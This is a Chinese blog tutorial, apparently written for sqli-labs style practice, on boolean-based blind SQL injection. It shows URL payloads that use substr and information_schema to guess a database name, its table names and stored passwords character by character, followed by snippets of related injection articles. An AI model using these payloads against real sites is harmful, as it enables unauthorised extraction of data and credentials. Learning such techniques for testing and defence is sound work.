sql注入———boolean注入（布尔盲注）

最新推荐文章于 2025-02-13 23:16:45 发布

原创最新推荐文章于 2025-02-13 23:16:45 发布 · 1k 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#sql #数据库

sql 专栏收录该内容

8 篇文章

订阅专栏

本文探讨了在SQL注入攻击中遇到preg_match函数过滤特定命令（如union）的情况。当网页仅返回True/False或yes/no时，布尔盲注成为有效的注入手段。通过爆破数据库名、表名及字段内容，例如使用substr和information_schema来逐个字符猜测，逐步揭示数据库信息。

sql注入———boolean注入（布尔盲注）

这里讲关于sql注入中出现一些过滤的情况之基于布尔注入
如果注入网站的源码中有preg_math函数来过滤了一些注入的命令
列如:
if(preg_math(“union|sleep|benchmark/i”,$id)）{
exit(“no”);
}
这里就过滤掉了union等注入命令

如果页面只返回True和False或yes和no两种类型页面
这种情况下就要使用布尔注入的方法来进行sql注入
直接先爆破数据库的名称：
?id=1’ and substr(database(),1,1)=‘a’ --+
然后抓包发送到爆破模块
然后将‘a’之后的字母逐个爆破

再爆破表名：
?id=1’ and substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)=‘a’–+
然后将字母’a’的位置进行爆破所有字母

用下面的这个命令可以进行爆破多个表：
?id=1’ and substr((select group_concat(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)=‘a’–+

爆破字段内容：
?id=1’ and substr((select password from users limit 0,1),1,1)=‘a’–+

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

hint=flag

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

SQL注入详解

渗透之路，攻防之间皆学问

05-05

26万+

SQL注入（SQL Injection）是一种常见的Web安全漏洞，主要形成的原因是在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。从而导致数据库受损（被脱库、被删除、甚至整个服务器权限陷）。即：注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...

[NSSRound#1 Basic]sql_by_sql - 二次注入+布尔盲注||sqlmap

oZuoShen123的博客

10-06

558

用burpsuite抓包，判断id类型，使用id=1 or 1=1，如果是字符型则会提示不存在，但是这里明显可以执行，说明id是数字型。1、所以先注册名为：admin’–+的用户，这样就可以直接修改admin密码，登录后，获取cookie。——如果这里的url写错了，是查不到的，而且cookie很重要，非admin的cookie无法进行查询。此时如果我们注册的用户名是admin’–+、admin’#、admin’–的话。1、构造sql注入语句，由于sqllite数据库，sql的保留字会有所区别。

参与评论您还未登录，请先登录后发表或查看评论

东哥视频学习笔记——SQL手工注入之布尔注入

gam0n的博客

08-28

475

1.mid(str,1,3)字符串截取，从第一个字符截取，取三个字符，即从第一个字符到第三个字符 2.ORD()转换为ascii码 3.length()统计字节长度 4.version()查看数据库版本 5.database()查看数据库名 6.user()查看用户名一、获取数据库名长度：通过单引号闭合前面sql查询语句， username=111' or length(...

SQL注入——基于Boolean的盲注

yuan114012的博客

05-20

1046

一.基于Boolean的盲注使用场景：没有数据回显，条件正确有结果错误没有结果利用方式：构造判断条件逐个猜测、 1.所需语法与函数 database() #获取当前数据库的名字 length(str) #计算 str 的长度 substr(str,起始位，截取位数) group_concat(列名) #把某列的全部值输出到一行，默认用逗号分隔二、举例说明基于Boolean的盲注，以...

SQL注入之布尔注入

南城无笙的Blog

04-11

1303

废话不多说，下面让我们开始介绍SQL注入的布尔注入，这里，作者使用的例子是sqli。来到对应的靶场，可以看到如下的画面：第二步然后，我们在其后面添加：?id=1返回如下画面：（这里虽然不是布尔值，但是其返回结果课讲You are in 看作yes，无返回看作no）第三步这时，我们在其后面加上英文的单引号，再查看其返回结果从下图可以看出，返回的是no（将这种返回值看作no）第四步...

前端学习11 js基础02 复选框、数据类型

weixin_44189110的博客

11-03

382

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> <style> .on{ b

sql注入实战—Boolean注入

qq_40909772的博客

07-15

1406

测试网站：自建靶场 http://192.168.57.128:1237/sql/boolean.php?id=1 测试工具：Burp Suite 1.访问目标测试地址，使用burp进行抓包。返回的测试结果如下所示: 2.使用id=1’ and 1=1%23，id=1’ and 1=2%23，发现返回的结果分别是yes和no，如下所示：由以上输出的结果可知，不能使用union注入，此处可以使用Boolean注入，Boolean注入是指在构造SQL判断语句1，通过查看页面的返回结果来推测哪些SQL判断

CTFHub_技能树_Web之SQL注入——时间盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写

Ho1aAs‘s Blog

12-22

2093

文章目录前言——时间盲注一、时间盲注原理时间盲注常用函数二、时间盲注Python脚本脚本使用事项Python3.0-3.7的版本Python3.8+的版本运行截图前言——时间盲注 CTFHub_技能树_Web之SQL注入——布尔盲注（含布尔盲注脚本）时间盲注基本思路类似于布尔盲注，细节可以访问上方给出的文章链接，不同的是布尔盲注是通过回显的对错提示来判断是否成功，而时间盲注是通过手动控制页面返回时间来判断是否成功一、时间盲注原理时间盲注常用函数以下是时间盲注常用的SQL语句： if(Bool

渗透测试——布尔盲注和时间盲注

zjdda的博客

07-12

2269

简要讲解盲注的两种类型：布尔盲注，时间盲注

【网安第二章】SQL注入拓展——各种注入方法详细介绍

lyj1597374034的博客

08-28

1028

目录找闭合符1. 描述2. 场景2.1场景一1. 搞清楚闭合符包含哪些符号2. 确定闭合符究竟是什么3.相关关卡2.2 场景二——未知正确输入的情况下1. 具体2.相关关卡确认是否存在注入点1. 描述2. 场景2.1 场景一——GET1. 具体2. 相关关卡2.2 场景二——POST1. 具体2. 相关关卡2.3 场景三——POST sqlmap1. 具体2. 相关关卡2.4 场景四——页面信息提示点1. 具体2. 相关关卡2.5 场景五——头部注入（UserAgent）1. 具体2. 相关关卡2.6 场景

SQL布尔盲注、时间盲注

最新发布

qwer2193940422的博客

02-13

408

布尔盲注（Boolean-based Blind SQL Injection）是一种SQL注入技术，用于在应用程序不直接显示数据库查询结果的情况下，通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的结果是否为真或假，进而推断出数据库中的具体信息。时间盲注（Time-based Blind SQL Injection）是一种SQL注入技术，用于在应用程序没有直接回显数据库查询结果的情况下，通过构造特定的SQL查询来推测数据库中的信息。

SQL注入之路之二：布尔型(boolean)盲注

weixin_62715196的博客

08-10

1824

简单描述什么是布尔型盲注以及对与布尔型盲注如何进行注入，通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入，并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔型注入的合理性

PL/SQL 数据类型和变量 -- BOOLEAN

千里之行始于足下

01-01

1872

-- Start PL/SQL 还支持布尔(BOOLEAN)数据类型。 DECLARE ISTEST BOOLEAN; BEGIN IF (ISTEST IS NULL) THEN DBMS_OUTPUT.PUT_LINE('UNKNOW'); END IF; ISTEST := TRUE; IF (ISTEST) THEN DBMS_OUTPUT.P

SQL注入之布尔式（boolean）注入

2301_79299101的博客

09-22

601

输入1' and if(substring(database(),1,1)='d',1,0)--+输入1'and if(length(database())=4,1,0) #其他的表名和列都用同样的方法，其他信息也是一样。输入 vince'and'1'='1。再输入 vince'and'1'='2。2，判断是数字式还是字符型。3，判断数据库有多少个字段。

SQL注入之盲注（Boolean类型）

破博客

09-21

1865

sql盲注适用于页面不直接返回数据，而是返回是或否，或者更简单的，正常显示或非正常显示，这时就需要来使用sql语句形成判断性返回值，例如正常返回或报错。以sqli-labs Less5举例访问http://localhost/sqli-labs/Less-5/?id=1后页面只显示了You are in……而没有像之前那样显示用户名等信息，尝试在URL后加单引号显示错误，有字符串注入的空间，将...

PL/SQL中BOOLEAN类型的三个值：TRUE、FALSE和NULL以及在MySQL中的对应表示

SmufHtml的博客

10-09

691

PL/SQL是一种过程化编程语言，广泛应用于Oracle数据库系统中。它提供了BOOLEAN数据类型，用于表示真值逻辑。BOOLEAN类型具有三个可能的值：TRUE、FALSE和NULL。在MySQL中，虽然没有直接的BOOLEAN类型，但可以通过其他数据类型和操作符来实现类似的功能。下面我们将详细介绍PL/SQL中BOOLEAN类型的使用，并展示在MySQL中如何模拟BOOLEAN类型。

SQL注入类型与技巧

09-01

5989

SQL注入类型与技巧

《WEB安全渗透测试》（2）SQL注入实战：boolean注入

午夜安全

10-01

3521

《WEB安全渗透测试》（2）SQL注入实战：boolean注入 Boolean注入：构造SQL判断语句，通过查看页面的返回结果来推测哪些SQL判断条件是成立的，以此来获取数据库中的数据。1）考虑使用boolean注入URL:http://www.tianchi.com/web/boolean.php?id=1URL:http://www.tianchi.com/web/boolean.php?id=1'发现页面只返回yes或者no,因此可以尝试使用boolean注入。......

sql注入之盲注(bool盲注,时间盲注)

m0_73994306的博客

02-13

641

当页面，但能通过间接判断SQL语句执行结果时。

sqli-labs靶场1-65关SQL注入通关详解

描述中提到“涵盖了SQL注入的多种技术”，具体包括联合注入（Union-based Injection）、布尔盲注（Boolean-based Blind Injection）、时间盲注（Time-based Blind Injection）、报错注入（Error-based Injection）...